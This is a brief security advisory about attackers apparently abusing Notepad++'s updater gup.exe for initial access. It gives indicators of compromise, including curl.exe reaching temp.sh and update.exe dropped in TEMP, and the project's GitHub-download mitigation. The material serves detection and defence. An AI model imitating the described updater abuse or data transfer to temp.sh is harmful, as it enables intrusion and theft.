Notepad++ Updater Abused for Initial Access in Limited Reports

Recent reports from small groups of Notepad++ users indicate that the tool's updater component, gup.exe, is being abused for initial access. This activity has been observed primarily in organizations linked to East Asia, with manual reconnaissance activities reported over the past two months. The abuse of gup.exe underscores the ongoing risk of supply chain attacks, where legitimate software components are exploited to deliver malware. Technically, gup.exe is responsible for checking and installing updates for Notepad++. By compromising this component, attackers can bypass traditional security measures and gain a foothold in targeted systems. Indicators of compromise include suspicious network requests from gup.exe, unusual sub-processes, the presence of files like update.exe in the TEMP folder, and the use of curl.exe to connect to temp.sh. In response to these threats, Notepad++ developers have implemented measures to force downloads via GitHub starting from version 8.8.8, aiming to limit interceptions. However, the continued abuse of gup.exe suggests that attackers are finding ways to circumvent these measures. The impact of this activity on the cybersecurity landscape is notable. While the reports are currently limited to small groups, the abuse of a widely used tool like Notepad++ highlights the potential for broader exploitation. This incident underscores the importance of securing all components of software, including update mechanisms, and monitoring systems for indicators of compromise. For cybersecurity professionals, it is crucial to monitor systems for the mentioned indicators and implement measures such as application whitelisting and network monitoring to detect and prevent such attacks. Additionally, keeping software up to date and verifying the integrity of update processes can help mitigate the risk of supply chain attacks.